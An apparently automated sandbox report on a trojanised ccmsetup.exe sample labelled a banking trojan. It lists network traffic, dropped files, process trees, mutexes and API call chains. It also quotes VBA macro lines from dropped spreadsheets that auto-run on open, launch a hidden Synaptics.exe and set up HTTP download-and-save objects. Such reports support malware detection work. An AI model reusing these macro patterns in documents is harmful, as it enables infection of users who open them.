                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443

                              E-Banking Fraud

                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_006266DC __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CertAddCertificateContextToStore,GetLastError,GetCurrentThreadId,CertFreeCertificateContext,2_2_006266DC

                              System Summary

                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: aOkCiDht.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: ZGGKNSUKOP.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: aOkCiDht.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: ZGGKNSUKOP.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: aOkCiDht.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: ZGGKNSUKOP.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_00604951: __EH_prolog3_catch,GetCurrentThreadId,GetFileAttributesW,GetLastError,GetCurrentThreadId,CreateFileW,GetLastError,GetCurrentThreadId,DeviceIoControl,GetLastError,GetCurrentThreadId,CloseHandle,2_2_00604951
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_0059892F __EH_prolog3_catch_GS,OpenSCManagerW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CreateServiceW,GetLastError,GetCurrentThreadId,StartServiceW,GetLastError,GetCurrentThreadId,OpenServiceW,GetLastError,GetCurrentThreadId,QueryServiceStatus,Sleep,DeleteService,GetLastError,CloseServiceHandle,Sleep,OpenServiceW,GetLastError,ControlService,Sleep,GetCurrentThreadId,CloseServiceHandle,CloseServiceHandle,2_2_0059892F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe File created: C:\Windows\ccmsetup\
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe File created: C:\Windows\ccmsetup\Logs
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe File created: C:\Windows\ccmsetup\Logs\ccmsetup.log
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe File created: C:\Windows\ccmsetup\cache
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
                              Source: aOkCiDht.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
                              Source: ZGGKNSUKOP.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11516
                              Source: ccmsetup.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: ccmsetup.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCXD7AF.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000003.2037350787.0000000000C06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000003.2037350787.0000000000C06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000000.2022999530.00000000004A5000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000003.2031437853.0000000002BAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe, 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs ccmsetup.exe
                              Source: ccmsetup.exe Binary or memory string: OriginalFileName vs ccmsetup.exe
                              Source: ccmsetup.exe Binary or memory string: OriginalFilenameb! vs ccmsetup.exe
                              Source: ccmsetup.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engine Classification label: mal100.bank.troj.expl.evad.winEXE@13/33@11/4
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005BB4AE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,2_2_005BB4AE
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_0058D725 __EH_prolog3_catch_GS,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentThreadId,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,GetCurrentThreadId,InitiateSystemShutdownExW,GetLastError,GetCurrentThreadId,CloseHandle,2_2_0058D725
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_00604016 CoCreateInstance,2_2_00604016
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_005987A7 __EH_prolog3_catch_GS,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,2_2_005987A7
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_0059892F __EH_prolog3_catch_GS,OpenSCManagerW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CreateServiceW,GetLastError,GetCurrentThreadId,StartServiceW,GetLastError,GetCurrentThreadId,OpenServiceW,GetLastError,GetCurrentThreadId,QueryServiceStatus,Sleep,DeleteService,GetLastError,CloseServiceHandle,Sleep,OpenServiceW,GetLastError,ControlService,Sleep,GetCurrentThreadId,CloseServiceHandle,CloseServiceHandle,2_2_0059892F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Code function: 2_2_0059BADB __EH_prolog3_catch,StartServiceCtrlDispatcherW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,2_2_0059BADB
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                              Source: C:\Users\user\Desktop\ccmsetup.exe File created: C:\Users\user\Desktop\._cache_ccmsetup.exe
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\CcmsetupMutex
                              Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2180
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\AppData\Local\Temp\aOkCiDht.xlsm
                              Source: Yara match File source: ccmsetup.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.ccmsetup.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCXD7AF.tmp, type: DROPPED
                              Source: Yara match File source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\ccmsetup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\Desktop\ccmsetup.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\ccmsetup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: ccmsetup.exe ReversingLabs: Detection: 92%
                              Source: ._cache_ccmsetup.exe String found in binary or memory: <Additional>%s</Additional>
                              Source: ._cache_ccmsetup.exe String found in binary or memory: Item '%s' is detected but needs repair/install. Add it to the list.
                              Source: C:\Users\user\Desktop\ccmsetup.exe File read: C:\Users\user\Desktop\ccmsetup.exe
                              Source: unknown Process created: C:\Users\user\Desktop\ccmsetup.exe "C:\Users\user\Desktop\ccmsetup.exe"
                              Source: C:\Users\user\Desktop\ccmsetup.exe Process created: C:\Users\user\Desktop\._cache_ccmsetup.exe "C:\Users\user\Desktop\._cache_ccmsetup.exe"
                              Source: C:\Users\user\Desktop\ccmsetup.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11516
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11544
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1912
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 4528
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11368
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11488
                              Source: C:\Users\user\Desktop\ccmsetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: C:\ProgramData\Synaptics\Synaptics.exe File written: C:\Users\user\AppData\Local\Temp\iaSUNtv.ini
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                              Source: ccmsetup.exe Static file information: File size 4873728 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: ccmsetup.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x3fb600
                              Source: Binary string: X:\bt\1024777\repo\out\retail-x86\ccmsetup\ccmsetup.pdb source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr
